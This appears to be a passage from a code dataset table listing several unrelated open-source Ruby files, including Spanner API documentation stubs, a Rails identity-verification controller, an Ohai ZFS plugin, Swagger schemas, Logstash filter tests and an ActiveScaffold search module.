hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
6a433e3ec6cdd8aa2cb02de83f33181a17c870dd | 8,614 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Spanner
module V1
# Results from {Google::Spanner::V1::Spanner::Read Read} or
# {Google::Spanner::V1::Spanner::ExecuteSql ExecuteSql}.
# @!attribute [rw] metadata
# @return [Google::Spanner::V1::ResultSetMetadata]
# Metadata about the result set, such as row type information.
# @!attribute [rw] rows
# @return [Array<Google::Protobuf::ListValue>]
# Each element in +rows+ is a row whose format is defined by
# {Google::Spanner::V1::ResultSetMetadata#row_type metadata::row_type}. The ith element
# in each row matches the ith field in
# {Google::Spanner::V1::ResultSetMetadata#row_type metadata::row_type}. Elements are
# encoded based on type as described
# {Google::Spanner::V1::TypeCode here}.
# @!attribute [rw] stats
# @return [Google::Spanner::V1::ResultSetStats]
# Query plan and execution statistics for the query that produced this
# result set. These can be requested by setting
# {Google::Spanner::V1::ExecuteSqlRequest#query_mode ExecuteSqlRequest#query_mode}.
class ResultSet; end
# Partial results from a streaming read or SQL query. Streaming reads and
# SQL queries better tolerate large result sets, large rows, and large
# values, but are a little trickier to consume.
# @!attribute [rw] metadata
# @return [Google::Spanner::V1::ResultSetMetadata]
# Metadata about the result set, such as row type information.
# Only present in the first response.
# @!attribute [rw] values
# @return [Array<Google::Protobuf::Value>]
# A streamed result set consists of a stream of values, which might
# be split into many +PartialResultSet+ messages to accommodate
# large rows and/or large values. Every N complete values defines a
# row, where N is equal to the number of entries in
# {Google::Spanner::V1::StructType#fields metadata::row_type::fields}.
#
# Most values are encoded based on type as described
# {Google::Spanner::V1::TypeCode here}.
#
# It is possible that the last value in values is "chunked",
# meaning that the rest of the value is sent in subsequent
# +PartialResultSet+(s). This is denoted by the {Google::Spanner::V1::PartialResultSet#chunked_value chunked_value}
# field. Two or more chunked values can be merged to form a
# complete value as follows:
#
# * +bool/number/null+: cannot be chunked
# * +string+: concatenate the strings
# * +list+: concatenate the lists. If the last element in a list is a
# +string+, +list+, or +object+, merge it with the first element in
# the next list by applying these rules recursively.
# * +object+: concatenate the (field name, field value) pairs. If a
# field name is duplicated, then apply these rules recursively
# to merge the field values.
#
# Some examples of merging:
#
# = Strings are concatenated.
# "foo", "bar" => "foobar"
#
# = Lists of non-strings are concatenated.
# [2, 3], [4] => [2, 3, 4]
#
# = Lists are concatenated, but the last and first elements are merged
# = because they are strings.
# ["a", "b"], ["c", "d"] => ["a", "bc", "d"]
#
# = Lists are concatenated, but the last and first elements are merged
# = because they are lists. Recursively, the last and first elements
# = of the inner lists are merged because they are strings.
# ["a", ["b", "c"]], [["d"], "e"] => ["a", ["b", "cd"], "e"]
#
# = Non-overlapping object fields are combined.
# {"a": "1"}, {"b": "2"} => {"a": "1", "b": 2"}
#
# = Overlapping object fields are merged.
# {"a": "1"}, {"a": "2"} => {"a": "12"}
#
# = Examples of merging objects containing lists of strings.
# {"a": ["1"]}, {"a": ["2"]} => {"a": ["12"]}
#
# For a more complete example, suppose a streaming SQL query is
# yielding a result set whose rows contain a single string
# field. The following +PartialResultSet+s might be yielded:
#
# {
# "metadata": { ... }
# "values": ["Hello", "W"]
# "chunked_value": true
# "resume_token": "Af65..."
# }
# {
# "values": ["orl"]
# "chunked_value": true
# "resume_token": "Bqp2..."
# }
# {
# "values": ["d"]
# "resume_token": "Zx1B..."
# }
#
# This sequence of +PartialResultSet+s encodes two rows, one
# containing the field value +"Hello"+, and a second containing the
# field value +"World" = "W" + "orl" + "d"+.
# @!attribute [rw] chunked_value
# @return [true, false]
# If true, then the final value in {Google::Spanner::V1::PartialResultSet#values values} is chunked, and must
# be combined with more values from subsequent +PartialResultSet+s
# to obtain a complete field value.
# @!attribute [rw] resume_token
# @return [String]
# Streaming calls might be interrupted for a variety of reasons, such
# as TCP connection loss. If this occurs, the stream of results can
# be resumed by re-sending the original request and including
# +resume_token+. Note that executing any other transaction in the
# same session invalidates the token.
# @!attribute [rw] stats
# @return [Google::Spanner::V1::ResultSetStats]
# Query plan and execution statistics for the query that produced this
# streaming result set. These can be requested by setting
# {Google::Spanner::V1::ExecuteSqlRequest#query_mode ExecuteSqlRequest#query_mode} and are sent
# only once with the last response in the stream.
class PartialResultSet; end
# Metadata about a {Google::Spanner::V1::ResultSet ResultSet} or {Google::Spanner::V1::PartialResultSet PartialResultSet}.
# @!attribute [rw] row_type
# @return [Google::Spanner::V1::StructType]
# Indicates the field names and types for the rows in the result
# set. For example, a SQL query like +"SELECT UserId, UserName FROM
# Users"+ could return a +row_type+ value like:
#
# "fields": [
# { "name": "UserId", "type": { "code": "INT64" } },
# { "name": "UserName", "type": { "code": "STRING" } },
# ]
# @!attribute [rw] transaction
# @return [Google::Spanner::V1::Transaction]
# If the read or SQL query began a transaction as a side-effect, the
# information about the new transaction is yielded here.
class ResultSetMetadata; end
# Additional statistics about a {Google::Spanner::V1::ResultSet ResultSet} or {Google::Spanner::V1::PartialResultSet PartialResultSet}.
# @!attribute [rw] query_plan
# @return [Google::Spanner::V1::QueryPlan]
# {Google::Spanner::V1::QueryPlan QueryPlan} for the query associated with this result.
# @!attribute [rw] query_stats
# @return [Google::Protobuf::Struct]
# Aggregated statistics from the execution of the query. Only present when
# the query is profiled. For example, a query could return the statistics as
# follows:
#
# {
# "rows_returned": "3",
# "elapsed_time": "1.22 secs",
# "cpu_time": "1.19 secs"
# }
class ResultSetStats; end
end
end
end | 49.222857 | 141 | 0.586951 |
e2614798c6794a2e502f70164bfe797f6e5e58f3 | 4,779 | module Insured
class InteractiveIdentityVerificationsController < ApplicationController
before_action :set_current_person
def new
service = ::IdentityVerification::InteractiveVerificationService.new
service_response = service.initiate_session(render_session_start)
respond_to do |format|
format.html do
if service_response.blank?
redirect_to :action => "service_unavailable"
else
if service_response.failed?
@step = 'start'
@verification_response= service_response
redirect_to :action => "failed_validation", :step => @step, :verification_transaction_id => @verification_response.transaction_id
else
@interactive_verification = service_response.to_model
render :new
end
end
end
end
end
def service_unavailable
set_consumer_bookmark_url
@person.consumer_role.move_identity_documents_to_outstanding
render "service_unavailable"
end
def failed_validation
set_consumer_bookmark_url
@step = params[:step]
@verification_transaction_id = params[:verification_transaction_id]
@person.consumer_role.move_identity_documents_to_outstanding
render "failed_validation"
end
def create
@interactive_verification = ::IdentityVerification::InteractiveVerification.new(params.require(:interactive_verification).permit!.to_h)
respond_to do |format|
format.html do
if @interactive_verification.valid?
service = ::IdentityVerification::InteractiveVerificationService.new
service_response = service.respond_to_questions(render_question_responses(@interactive_verification))
if service_response.blank?
redirect_to :action => "service_unavailable"
else
if service_response.successful?
process_successful_interactive_verification(service_response)
else
@step = 'questions'
@verification_response= service_response
redirect_to :action => "failed_validation", :step => @step, :verification_transaction_id => @verification_response.transaction_id
end
end
else
render "new"
end
end
end
end
def update
@transaction_id = params.require(:id)
respond_to do |format|
format.html do
service = ::IdentityVerification::InteractiveVerificationService.new
service_response = service.check_override(render_verification_override(@transaction_id))
if service_response.blank?
redirect_to :action => "service_unavailable"
else
if service_response.successful?
process_successful_interactive_verification(service_response)
else
@verification_response = service_response
redirect_to :action => "failed_validation", :verification_transaction_id => @verification_response.transaction_id
end
end
end
end
end
def process_successful_interactive_verification(service_response)
consumer_role = @person.consumer_role
consumer_user = @person.user
#TODO TREY KEVIN JIM There is no user when CSR creates enroooment
if consumer_user
consumer_user.identity_final_decision_code = User::INTERACTIVE_IDENTITY_VERIFICATION_SUCCESS_CODE
consumer_user.identity_response_code = User::INTERACTIVE_IDENTITY_VERIFICATION_SUCCESS_CODE
consumer_user.identity_response_description_text = service_response.response_text
consumer_user.identity_final_decision_transaction_id = service_response.transaction_id
consumer_user.identity_verified_date = TimeKeeper.date_of_record
consumer_user.save!
end
consumer_role.move_identity_documents_to_verified
redirect_to consumer_role.admin_bookmark_url.present? ? consumer_role.admin_bookmark_url : insured_family_members_path(:consumer_role_id => consumer_role.id)
end
def render_session_start
render_to_string "events/identity_verification/interactive_session_start", :formats => ["xml"], :locals => { :individual => @person }
end
def render_question_responses(session)
render_to_string "events/identity_verification/interactive_questions_response", :formats => ["xml"], :locals => { :session => session }
end
def render_verification_override(transaction_id)
render_to_string "events/identity_verification/interactive_verification_override", :formats => ["xml"], :locals => { :transaction_id => transaction_id }
end
end
end
| 41.556522 | 163 | 0.69638 |
b9b07287501bd197f1a98eb2006c334852d72be2 | 2,318 | #
# Author:: Jason J. W. Williams ([email protected])
# Copyright:: Copyright (c) 2011 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
Ohai.plugin(:Zpools) do
provides "zpools"
collect_data(:solaris2) do
pools = Mash.new
# Grab ZFS zpools overall health and attributes
so = shell_out("zpool list -H -o name,size,alloc,free,cap,dedup,health,version")
so.stdout.lines do |line|
case line
when /^([-_0-9A-Za-z]*)\s+([.0-9]+[MGTPE])\s+([.0-9]+[MGTPE])\s+([.0-9]+[MGTPE])\s+(\d+%)\s+([.0-9]+x)\s+([-_0-9A-Za-z]+)\s+(\d+|-)$/
pools[$1] = Mash.new
pools[$1][:pool_size] = $2
pools[$1][:pool_allocated] = $3
pools[$1][:pool_free] = $4
pools[$1][:capacity_used] = $5
pools[$1][:dedup_factor] = $6
pools[$1][:health] = $7
pools[$1][:zpool_version] = $8
end
end
# Grab individual health for devices in the zpools
for pool in pools.keys
pools[pool][:devices] = Mash.new
# Run "zpool status" as non-root user (adm) so that
# the command won't try to open() each device which can
# hang the command if any of the disks are bad.
so = shell_out("su adm -c \"zpool status #{pool}\"")
so.stdout.lines do |line|
case line
when /^\s+(c[-_a-zA-Z0-9]+)\s+([-_a-zA-Z0-9]+)\s+(\d+)\s+(\d+)\s+(\d+)$/
pools[pool][:devices][$1] = Mash.new
pools[pool][:devices][$1][:state] = $2
pools[pool][:devices][$1][:errors] = Mash.new
pools[pool][:devices][$1][:errors][:read] = $3
pools[pool][:devices][$1][:errors][:write] = $4
pools[pool][:devices][$1][:errors][:checksum] = $5
end
end
end
# Set the zpools data
zpools pools
end
end
| 35.661538 | 139 | 0.601381 |
6a903b1d62a228052963efff4d06a48d66903050 | 2,444 | # frozen_string_literal: true
module Swagger
module Schemas
module Health
class Prescriptions
include Swagger::Blocks
swagger_schema :Prescriptions do
key :required, %i[data meta]
property :data, type: :array, minItems: 1, uniqueItems: true do
items do
key :'$ref', :PrescriptionBase
end
end
property :meta do
key :'$ref', :MetaFailedStationListSortPagination
end
property :links do
key :'$ref', :LinksAll
end
end
swagger_schema :Prescription do
key :required, %i[data meta]
property :data, type: :object do
key :'$ref', :PrescriptionBase
end
property :meta do
key :'$ref', :MetaFailedStationList
end
end
swagger_schema :PrescriptionBase do
key :required, %i[id type attributes links]
property :id, type: :string
property :type, type: :string, enum: [:prescriptions]
property :attributes, type: :object do
key :required, %i[
prescription_id prescription_number prescription_name refill_status refill_submit_date
refill_date refill_remaining facility_name ordered_date quantity expiration_date
dispensed_date station_number is_refillable is_trackable
]
property :prescription_id, type: :integer
property :prescription_number, type: :string
property :prescription_name, type: :string
property :refill_status, type: :string
property :refill_submit_date, type: %i[string null], format: :date
property :refill_date, type: :string, format: :date
property :refill_remaining, type: :integer
property :facility_name, type: :string
property :ordered_date, type: :string, format: :date
property :quantity, type: :integer
property :expiration_date, type: :string, format: :date
property :dispensed_date, type: %i[string null], format: :date
property :station_number, type: :string
property :is_refillable, type: :boolean
property :is_trackable, type: :boolean
end
property :links do
key :'$ref', :LinksSelf
end
end
end
end
end
end
| 32.586667 | 100 | 0.589607 |
62c80d8d7e06da3861deee326b4cf78fdb2f74e5 | 19,040 | # encoding: utf-8
require "logstash/devutils/rspec/spec_helper"
require "logstash/filters/aggregate"
require_relative "aggregate_spec_helper"
describe LogStash::Filters::Aggregate do
before(:each) do
reset_pipeline_variables()
@start_filter = setup_filter({ "map_action" => "create", "code" => "map['sql_duration'] = 0" })
@update_filter = setup_filter({ "map_action" => "update", "code" => "map['sql_duration'] += event.get('duration')" })
@end_filter = setup_filter({"timeout_task_id_field" => "my_id", "push_map_as_event_on_timeout" => true, "map_action" => "update", "code" => "event.set('sql_duration', map['sql_duration'])", "end_of_task" => true, "timeout" => 5, "inactivity_timeout" => 2, "timeout_code" => "event.set('test', 'testValue')", "timeout_tags" => ["tag1", "tag2"] })
end
context "Validation" do
describe "and register a filter with a task_id without dynamic expression" do
it "raises a LogStash::ConfigurationError" do
expect {
setup_filter({ "code" => "", "task_id" => "static_value" })
}.to raise_error(LogStash::ConfigurationError)
end
end
describe "and register a filter with inactivity_timeout longer than timeout" do
it "raises a LogStash::ConfigurationError" do
expect {
# use a diffrent task_id pattern, otherwise the timeout settings cannot be updated
setup_filter({ "task_id" => "%{taskid2}", "code" => "", "timeout" => 2, "inactivity_timeout" => 3 })
}.to raise_error(LogStash::ConfigurationError)
end
end
end
context "Start event" do
describe "and receiving an event without task_id" do
it "does not record it" do
@start_filter.filter(event())
expect(aggregate_maps["%{taskid}"]).to be_empty
end
end
describe "and receiving an event with task_id" do
it "records it" do
event = start_event("taskid" => "id123")
@start_filter.filter(event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"]["id123"]).not_to be_nil
expect(aggregate_maps["%{taskid}"]["id123"].creation_timestamp).to be >= event.timestamp.time
expect(aggregate_maps["%{taskid}"]["id123"].map["sql_duration"]).to eq(0)
end
end
describe "and receiving two 'start events' for the same task_id" do
it "keeps the first one and does nothing with the second one" do
first_start_event = start_event("taskid" => "id124")
@start_filter.filter(first_start_event)
first_update_event = update_event("taskid" => "id124", "duration" => 2)
@update_filter.filter(first_update_event)
sleep(1)
second_start_event = start_event("taskid" => "id124")
@start_filter.filter(second_start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"]["id124"].creation_timestamp).to be < second_start_event.timestamp.time
expect(aggregate_maps["%{taskid}"]["id124"].map["sql_duration"]).to eq(first_update_event.get("duration"))
end
end
end
context "End event" do
describe "receiving an event without a previous 'start event'" do
describe "but without a previous 'start event'" do
it "does nothing with the event" do
end_event = end_event("taskid" => "id124")
@end_filter.filter(end_event)
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(end_event.get("sql_duration")).to be_nil
end
end
end
end
context "Start/end events interaction" do
describe "receiving a 'start event'" do
before(:each) do
@task_id_value = "id_123"
@start_event = start_event({"taskid" => @task_id_value})
@start_filter.filter(@start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
describe "and receiving an end event" do
describe "and without an id" do
it "does nothing" do
end_event = end_event()
@end_filter.filter(end_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(end_event.get("sql_duration")).to be_nil
end
end
describe "and an id different from the one of the 'start event'" do
it "does nothing" do
different_id_value = @task_id_value + "_different"
@end_filter.filter(end_event("taskid" => different_id_value))
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"][@task_id_value]).not_to be_nil
end
end
describe "and the same id of the 'start event'" do
it "add 'sql_duration' field to the end event and deletes the aggregate map associated to taskid" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"][@task_id_value].map["sql_duration"]).to eq(0)
@update_filter.filter(update_event("taskid" => @task_id_value, "duration" => 2))
expect(aggregate_maps["%{taskid}"][@task_id_value].map["sql_duration"]).to eq(2)
end_event = end_event("taskid" => @task_id_value)
@end_filter.filter(end_event)
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(end_event.get("sql_duration")).to eq(2)
end
end
end
end
end
context "Event with integer task id" do
it "works as well as with a string task id" do
start_event = start_event("taskid" => 124)
@start_filter.filter(start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
end
context "Event which causes an exception when code call" do
it "intercepts exception, logs the error and tags the event with '_aggregateexception'" do
@start_filter = setup_filter({ "code" => "fail 'Test'" })
start_event = start_event("taskid" => "id124")
@start_filter.filter(start_event)
expect(start_event.get("tags")).to eq(["_aggregateexception"])
end
end
context "flush call" do
before(:each) do
@end_filter.timeout = 1
expect(@end_filter.timeout).to eq(1)
@task_id_value = "id_123"
@start_event = start_event({"taskid" => @task_id_value})
@start_filter.filter(@start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
describe "no timeout defined in none filter" do
it "defines a default timeout on a default filter" do
reset_timeout_management()
@end_filter.timeout = nil
expect(taskid_eviction_instance).to be_nil
@end_filter.flush()
expect(taskid_eviction_instance).to eq(@end_filter)
expect(@end_filter.timeout).to eq(LogStash::Filters::Aggregate::DEFAULT_TIMEOUT)
end
end
describe "timeout is defined on another filter" do
it "taskid eviction_instance is not updated" do
expect(taskid_eviction_instance).not_to be_nil
@start_filter.flush()
expect(taskid_eviction_instance).not_to eq(@start_filter)
expect(taskid_eviction_instance).to eq(@end_filter)
end
end
describe "no timeout defined on the filter" do
it "event is not removed" do
sleep(2)
@start_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
end
describe "timeout defined on the filter" do
it "event is not removed if not expired" do
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(entries).to be_empty
end
it "removes event if expired and creates a new timeout event" do
sleep(2)
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(entries.size).to eq(1)
expect(entries[0].get("my_id")).to eq("id_123") # task id
expect(entries[0].get("sql_duration")).to eq(0) # Aggregation map
expect(entries[0].get("test")).to eq("testValue") # Timeout code
expect(entries[0].get("tags")).to eq(["tag1", "tag2"]) # Timeout tags
end
end
describe "timeout defined on another filter with another task_id pattern" do
it "does not remove event" do
another_filter = setup_filter({ "task_id" => "%{another_taskid}", "code" => "", "timeout" => 1 })
sleep(2)
entries = another_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(entries).to be_empty
end
end
context "inactivity_timeout" do
before(:each) do
@end_filter.timeout = 4
expect(@end_filter.timeout).to eq(4)
@end_filter.inactivity_timeout = 2
expect(@end_filter.inactivity_timeout).to eq(2)
@task_id_value = "id_123"
@start_event = start_event({"taskid" => @task_id_value})
@start_filter.filter(@start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
describe "event arrives before inactivity_timeout" do
it "does not remove event if another" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(entries).to be_empty
end
end
describe "no event arrives after inactivity_timeout" do
it "removes event" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
sleep(3)
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(entries.size).to eq(1)
end
end
describe "timeout expires while events arrive within inactivity_timeout" do
it "removes event" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
sleep(2)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(entries.size).to eq(1)
end
end
end
end
context "aggregate_maps_path option is defined, " do
describe "close event append then register event append, " do
it "stores aggregate maps to configured file and then loads aggregate maps from file" do
store_file = "aggregate_maps"
File.delete(store_file) if File.exist?(store_file)
expect(File.exist?(store_file)).to be false
one_filter = setup_filter({ "task_id" => "%{one_special_field}", "code" => ""})
store_filter = setup_filter({ "code" => "map['sql_duration'] = 0", "aggregate_maps_path" => store_file })
expect(aggregate_maps["%{one_special_field}"]).to be_empty
expect(aggregate_maps["%{taskid}"]).to be_empty
start_event = start_event("taskid" => 124)
filter = store_filter.filter(start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
@end_filter.close()
expect(aggregate_maps).not_to be_empty
store_filter.close()
expect(File.exist?(store_file)).to be true
expect(current_pipeline).to be_nil
one_filter = setup_filter({ "task_id" => "%{one_special_field}", "code" => ""})
store_filter = setup_filter({ "code" => "map['sql_duration'] = 0", "aggregate_maps_path" => store_file })
expect(File.exist?(store_file)).to be false
expect(aggregate_maps["%{one_special_field}"]).to be_empty
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
end
describe "when aggregate_maps_path option is defined in 2 instances, " do
it "raises Logstash::ConfigurationError" do
expect {
setup_filter({ "code" => "", "aggregate_maps_path" => "aggregate_maps1" })
setup_filter({ "code" => "", "aggregate_maps_path" => "aggregate_maps2" })
}.to raise_error(LogStash::ConfigurationError)
end
end
end
context "Logstash reload occurs, " do
describe "close method is called, " do
it "reinitializes pipelines" do
@end_filter.close()
expect(current_pipeline).to be_nil
@end_filter.register()
expect(current_pipeline).not_to be_nil
expect(aggregate_maps).not_to be_nil
expect(pipeline_close_instance).to be_nil
end
end
end
context "push_previous_map_as_event option is defined, " do
describe "when push_previous_map_as_event option is activated on another filter with same task_id pattern" do
it "should throw a LogStash::ConfigurationError" do
expect {
setup_filter({"code" => "map['taskid'] = event.get('taskid')", "push_previous_map_as_event" => true})
}.to raise_error(LogStash::ConfigurationError)
end
end
describe "when a new task id is detected, " do
it "should push previous map as new event" do
push_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['ppm_id'] = event.get('ppm_id')", "push_previous_map_as_event" => true, "timeout" => 5, "timeout_task_id_field" => "timeout_task_id_field" })
push_filter.filter(event({"ppm_id" => "1"})) { |yield_event| fail "task 1 shouldn't have yield event" }
push_filter.filter(event({"ppm_id" => "2"})) do |yield_event|
expect(yield_event.get("ppm_id")).to eq("1")
expect(yield_event.get("timeout_task_id_field")).to eq("1")
end
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
end
end
describe "when timeout happens, " do
it "flush method should return last map as new event" do
push_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['ppm_id'] = event.get('ppm_id')", "push_previous_map_as_event" => true, "timeout" => 1, "timeout_code" => "event.set('test', 'testValue')" })
push_filter.filter(event({"ppm_id" => "1"}))
sleep(2)
events_to_flush = push_filter.flush()
expect(events_to_flush).not_to be_nil
expect(events_to_flush.size).to eq(1)
expect(events_to_flush[0].get("ppm_id")).to eq("1")
expect(events_to_flush[0].get('test')).to eq("testValue")
expect(aggregate_maps["%{ppm_id}"].size).to eq(0)
end
end
describe "when Logstash shutdown happens, " do
it "flush method should return last map as new event even if timeout has not occured" do
push_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "", "push_previous_map_as_event" => true, "timeout" => 4 })
push_filter.filter(event({"ppm_id" => "1"}))
events_to_flush = push_filter.flush({:final=>false})
expect(events_to_flush).to be_empty
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
events_to_flush = push_filter.flush({:final=>true})
expect(events_to_flush).not_to be_nil
expect(events_to_flush.size).to eq(1)
expect(events_to_flush[0].get("tags")).to eq(["_aggregatefinalflush"])
expect(aggregate_maps["%{ppm_id}"].size).to eq(0)
end
end
end
context "timeout_timestamp_field option is defined, " do
describe "when 3 old events arrive, " do
it "should push a new aggregated event using timeout based on events timestamp" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['sql_duration'] ||= 0; map['sql_duration'] += event.get('duration')", "timeout_timestamp_field" => "@timestamp", "push_map_as_event_on_timeout" => true, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1", "duration" => 2, "@timestamp" => timestamp("2018-01-31T00:00:00Z")})) { |yield_event| fail "it shouldn't have yield event" }
agg_filter.filter(event({"ppm_id" => "1", "duration" => 3, "@timestamp" => timestamp("2018-01-31T00:00:01Z")})) { |yield_event| fail "it shouldn't have yield event" }
events_to_flush = agg_filter.flush()
expect(events_to_flush).to be_empty
agg_filter.filter(event({"ppm_id" => "1", "duration" => 4, "@timestamp" => timestamp("2018-01-31T00:05:00Z")})) do |yield_event|
expect(yield_event).not_to be_nil
expect(yield_event.get("sql_duration")).to eq(5)
end
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
expect(aggregate_maps["%{ppm_id}"]["1"].map["sql_duration"]).to eq(4)
end
end
end
context "custom timeout on map_meta, " do
describe "when map_meta.timeout=0, " do
it "should push a new aggregated event immediately" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['sql_duration'] = 2; map_meta.timeout = 0", "push_map_as_event_on_timeout" => true, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1"})) do |yield_event|
expect(yield_event).not_to be_nil
expect(yield_event.get("sql_duration")).to eq(2)
end
expect(aggregate_maps["%{ppm_id}"]).to be_empty
end
end
describe "when map_meta.timeout=0 and push_map_as_event_on_timeout=false, " do
it "should just remove expired map and not push an aggregated event" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map_meta.timeout = 0", "push_map_as_event_on_timeout" => false, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1"})) { |yield_event| fail "it shouldn't have yield event" }
expect(aggregate_maps["%{ppm_id}"]).to be_empty
end
end
describe "when map_meta.inactivity_timeout=1, " do
it "should push a new aggregated event at next flush call" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['sql_duration'] = 2; map_meta.inactivity_timeout = 1", "push_map_as_event_on_timeout" => true, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1"})) { |yield_event| fail "it shouldn't have yield event" }
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
sleep(2)
events_to_flush = agg_filter.flush()
expect(events_to_flush.size).to eq(1)
expect(aggregate_maps["%{ppm_id}"]).to be_empty
end
end
end
context "Custom event generation code is used" do
describe "when a new event is manually generated" do
it "should push a new event immediately" do
agg_filter = setup_filter({ "task_id" => "%{task_id}", "code" => "map['sql_duration'] = 2; new_event_block.call(LogStash::Event.new({:my_sql_duration => map['sql_duration']}))", "timeout" => 120 })
agg_filter.filter(event({"task_id" => "1"})) do |yield_event|
expect(yield_event).not_to be_nil
expect(yield_event.get("my_sql_duration")).to eq(2)
end
end
end
end
end | 43.669725 | 349 | 0.636345 |
391ed898c8cca178fac5dab2c4e2bc2a168db4bc | 1,254 | # -*- encoding: utf-8 -*-
# stub: globalid 0.3.6 ruby lib
Gem::Specification.new do |s|
s.name = "globalid"
s.version = "0.3.6"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["David Heinemeier Hansson"]
s.date = "2015-08-04"
s.description = "URIs for your models makes it easy to pass references around."
s.email = "[email protected]"
s.homepage = "http://www.rubyonrails.org"
s.licenses = ["MIT"]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3")
s.rubygems_version = "2.4.7"
s.summary = "Refer to any model with a URI: gid://app/class/id"
s.installed_by_version = "2.4.7" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<activesupport>, [">= 4.1.0"])
s.add_development_dependency(%q<rake>, [">= 0"])
else
s.add_dependency(%q<activesupport>, [">= 4.1.0"])
s.add_dependency(%q<rake>, [">= 0"])
end
else
s.add_dependency(%q<activesupport>, [">= 4.1.0"])
s.add_dependency(%q<rake>, [">= 0"])
end
end
| 33.891892 | 105 | 0.651515 |
083d22206ed18ba99b698ad00a7c2a2fc9095ab6 | 359 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Consumption::Mgmt::V2019_06_01
module Models
#
# Defines values for CategoryType
#
module CategoryType
Cost = "Cost"
Usage = "Usage"
end
end
end
| 21.117647 | 70 | 0.688022 |
1dc70bebccca4ea86ab2338c3f0baf8d17ac6521 | 2,260 | module ActiveScaffold::Actions
module FieldSearch
include ActiveScaffold::Actions::CommonSearch
def self.included(base)
base.before_filter :search_authorized_filter, :only => :show_search
base.before_filter :store_search_params_into_session, :only => [:list, :index]
base.before_filter :do_search, :only => [:list, :index]
base.helper_method :field_search_params
end
# FieldSearch uses params[:search] and not @record because search conditions do not always pass the Model's validations.
# This facilitates for example, textual searches against associations via .search_sql
def show_search
@record = active_scaffold_config.model.new
respond_to_action(:field_search)
end
protected
def field_search_params
search_params || {}
end
def field_search_respond_to_html
render(:action => "field_search")
end
def field_search_respond_to_js
render(:partial => "field_search")
end
def do_search
unless search_params.blank?
text_search = active_scaffold_config.field_search.text_search
search_conditions = []
columns = active_scaffold_config.field_search.columns
search_params.each do |key, value|
next unless columns.include? key
search_conditions << self.class.condition_for_column(active_scaffold_config.columns[key], value, text_search)
end
search_conditions.compact!
self.active_scaffold_conditions = merge_conditions(self.active_scaffold_conditions, *search_conditions)
@filtered = !search_conditions.blank?
